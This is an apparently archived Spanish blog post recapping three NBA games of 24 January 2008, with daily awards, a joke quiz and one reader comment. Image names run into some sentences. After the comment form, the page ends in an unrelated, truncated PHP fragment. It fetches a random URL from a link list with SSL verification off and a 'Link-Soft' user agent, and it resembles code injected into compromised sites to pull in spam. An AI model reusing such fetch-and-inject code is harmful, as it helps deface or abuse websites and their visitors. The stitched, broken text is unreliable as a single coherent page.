La crónica (24/01/08)

25 de January de 2008 por MagicJohnson32

Es habitual que los jueves se disputen pocos partidos. Anoche no fue excepción y la actividad NBA se redujo a tres encuentros que no depararon grandes sorpresas aunque sí bastante emoción, ya que dos de ellos no se decidieron hasta la bocina final. Veamos primero el resumen en imágenes de estos partidos:

La noche se abrió con el partido entre Pacers y Bucks, dos equipos que se verán con mucha frecuencia a partir de ahora ya que el de anoche es sólo el primero de sus cuatro enfrentamientos en regular season. Los Pacers, que llevan diez partidos consecutivos encajando más de 100 puntos y que venían de recibir 38 de Hinrich la noche anterior, vieron como esta vez era Michael Redd quien se iba hasta los 37 puntos para llevar a los Bucks a la victoria, 92-104. La cada vez mayor solidez de Bogut y la aportación de Simmons, junto con un parcial de 19-30 en el cuarto decisivo, fueron demasiado para unos Pacers que no pudieron disponer de Tinsley y que pagaron la mínima aportación de su banquillo.

Más emocionante de lo esperado pero con el final más previsible resultó la visita de los Spurs a Miami. Los locales estuvieron más de 46 minutos por delante en el marcador pero, finalmente, sumaron su 15ª derrota consecutiva, que les deja a dos de igualar la peor racha de la historia de la franquicia, que data de la temporada de su debut en la NBA. Tim Duncan brilló de nuevo con 30 puntos, 14 de 19 en tiros de campo, 11 rebotes, 5 asistencias, y Manu Ginóbili fue decisivo para el 90-89 final, además de acercarse al triple-doble con 18-11-8. Los 50 puntos que lograron entre Wade, que añadió 9 asistencias, y Mark Blount (10 de 17 en tiros) no fueron suficiente para un equipo que sigue en caída libre apenas año y medio después de lograr el anillo. Aunque es difícil salir del pozo haciendo cosas como ésta…

Más que emocionante, el partido entre Nets y Warriors resultó una locura. Los de Oackland dominaron en el inicio y amagaron con romper el partido, pero los de New Jersey aguantaron el tirón y se pusieron por delante durante el tercer cuarto. Los Nets lograron una ventaja de 9 puntos en el inicio del último periodo (94-85), momento en el se produjo lo inesperado: en menos de 4 minutos, los Warriors lograron un parcial de 0-22 con 11 puntos de Harrington, 7 de Baron Davis y 4 de Ellis. Pero los visitantes fueron capaces de reaccionar y llegaron a situarse por delante con un parcial de 20-4 que ponía el marcador 114-111 a menos de 1:30 para el final. Entonces aparecieron Monta Ellis (39 puntos) y Baron Davis, autor de 25 puntos, 12 rebotes, 10 asistencias y 5 robos, para dar el triunfo 119-121 a su equipo. Para los Nets, que encajan así su sexta derrota seguida, destacaron Jefferson con 34 puntos y 9 asistencias, Carter con 29 puntos y Boone, con 21 puntos y 17 rebotes.

Seguimos con nuestros habituales premios:

Nuestro MVP: Parece increíble que una jornada con tan sólo 3 partidos pueda aportar tantos candidatos al MVP del día: Duncan con 30 puntos y 11 rebotes, Michael Redd con 37-5-5, Richard Jefferson con 34 puntos y 9 asistencias, Monta Ellisbarondavisnjnets con 39 puntos y 13 de 18 en tiros han sido los que más cerca se han quedado de conseguirlo. Pero hoy, el MVP es para el triple doble de Baron Davis: 25 puntos, 12 rebotes y 10 asistencias, con el añadido de 5 recuperaciones.

El rookie: Pocos rookies han jugado esta noche y uno es nuestra decepción del día, así que el premio se va para el otro. Sean Williams ha jugado sólo 15 minutos pero lo ha hecho con la intensidad suficiente para recoger 6 rebotes y anotar 6 puntos. Si sigue creciendo como jugador será muy importante para los Nets.

La sorpresa: Nos congratula ver que Bobby Simmons ha vuelto después de estar medio desaparecido durante 2 temporadas anotando hoy 16 puntos. Vemos también que un pivot como Mark Blount puede hacer los números que venía ofreciendo Shaq o mejores (hoy 23 puntos) si Riley le da minutos. Pero la gran sorpresa son los 21 puntos y 17 rebotes de Josh Boone. No lo tendrá nada fácil Krstic para ganarse el puesto a su vuelta.

La decepción: Es un rookie y como tal no se le puede exigir lo mismo que a otros jugadores pero los últimos partidos de Ji Yianlian indican que el rookie wall le ha dado de lleno: 13 minutos en cancha para un triste balance de 6 puntos y 1 rebote.

Pasatiempos:

¿Qué trata de hacer Bruce Bowen a Micky Arison, brucebowenheatpropietario de los Heat?

A) Le felicita por la buena racha de su equipo

B) Le desea buena suerte con los contratos de O’Neal, Haslem y Blount, que en 2010 cobrarán 35 millones

C) Le hace una llave de judo

D) Le roba el reloj

E) Le saluda, ya que son viejos conocidos de la época en que Bowen jugó en los Heat

Respuesta correcta: E, aunque no nos atrevemos a descartar la C. El ganador será premiado con el DVD “Las mejores técnicas de artes marciales de Bruce Bowen”, incluyendo su legendaria patada voladora:

Y acabamos con las 10 mejores jugadas de la pasada madrugada:

Comenta

Un comentario a esta entrada

  1. duncan21 dice:
    #1

    jode q grande bruce bowen, es el amo…con lo pardillitos que parecen parker y duncan este tio se mea en todos los que van de gangsters y demas, es el que mas reparte sin duda sin parecer un “malote”

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>